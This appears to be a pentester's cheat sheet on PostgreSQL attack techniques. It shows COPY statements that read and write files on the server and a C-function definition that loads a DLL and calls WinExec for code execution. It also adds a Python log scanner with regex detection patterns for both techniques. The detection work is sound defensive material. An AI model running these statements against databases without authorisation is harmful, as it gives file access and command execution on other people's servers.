PostgreSQL

This is a collection of PostgreSQL functionality, snippets and attack vectors that pentesters and red teamers can use when testing a PostgreSQL database server.

Interacting with Filesystems:

COPY:

You can create a temporary table, use COPY to read file contents into it or write its contents out to the database server's filesystem, and drop the temporary table afterwards.

Reading from a file:

COPY tableName FROM 'fileName';

Writing to a file:

COPY tableName TO 'fileName';

Define a function with Custom DLL Extension for Code Execution:

CREATE OR REPLACE FUNCTION functionName(cstring) RETURNS int AS 'C:\Path\to\Extension.dll', 'WinExec' LANGUAGE C STRICT;

Then execute the function:

SELECT functionName(Argument);
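
Detecting these statements in the server log:

Both techniques above appear verbatim in the server log when log_statement is enabled, so a defender can flag them there. The following Python is an added example, not part of the original page: it reports file-backed COPY statements and C-language functions loaded from outside $libdir. The log lines, table names and paths in SAMPLE_LOG are constructed, and the default '%m [%p] ' log prefix is assumed.

```python
import re

# Matches the statement text PostgreSQL logs when log_statement is enabled.
STATEMENT = re.compile(r"\bstatement:\s+(?P<sql>.*)$", re.IGNORECASE)
# Server-side COPY with a quoted file path (COPY ... FROM STDIN / TO STDOUT is client-side).
COPY_FILE = re.compile(
    r"\bCOPY\s+(?P<table>[\w.\"]+)(?:\s*\([^)]*\))?\s+(?P<dir>FROM|TO)\s+"
    r"E?'(?P<path>(?:[^']|'')*)'", re.IGNORECASE)
CREATE_FUNC = re.compile(
    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?P<name>[\w.\"]+)", re.IGNORECASE)
LANGUAGE_C = re.compile(r"\bLANGUAGE\s+C\b", re.IGNORECASE)
AS_LIBRARY = re.compile(r"\bAS\s+E?'(?P<lib>(?:[^']|'')*)'", re.IGNORECASE)

# Constructed sample log lines; not taken from a real server.
SAMPLE_LOG = [
    "2024-05-01 10:00:01.120 UTC [4121] LOG:  statement: COPY tmp_import FROM '/path/to/input.txt';",
    "2024-05-01 10:00:02.300 UTC [4121] LOG:  statement: COPY tmp_import TO '/path/to/output.txt';",
    "2024-05-01 10:00:03.010 UTC [4122] LOG:  statement: COPY orders TO STDOUT;",
    r"2024-05-01 10:00:04.550 UTC [4121] LOG:  statement: CREATE OR REPLACE FUNCTION "
    r"functionName(cstring) RETURNS int AS 'C:\Path\to\Extension.dll', 'WinExec' LANGUAGE C STRICT;",
    "2024-05-01 10:00:05.000 UTC [4123] LOG:  statement: SELECT count(*) FROM orders;",
]

def findings(log_lines):
    """Return (kind, object, path) tuples for file-backed COPY and C functions outside $libdir."""
    out = []
    for line in log_lines:
        stmt = STATEMENT.search(line)
        if not stmt:
            continue
        sql = stmt.group("sql")
        copy = COPY_FILE.search(sql)
        if copy:
            kind = "file_read" if copy.group("dir").upper() == "FROM" else "file_write"
            out.append((kind, copy.group("table"), copy.group("path")))
        func, lib = CREATE_FUNC.search(sql), AS_LIBRARY.search(sql)
        if func and lib and LANGUAGE_C.search(sql):
            # Packaged extensions load from $libdir; any other library path needs review.
            if not lib.group("lib").startswith("$libdir"):
                out.append(("c_function", func.group("name"), lib.group("lib")))
    return out

if __name__ == "__main__":
    for finding in findings(SAMPLE_LOG):
        print(finding)
```

Statements that span several lines are logged with tab-indented continuation lines and need to be joined before they are passed to findings().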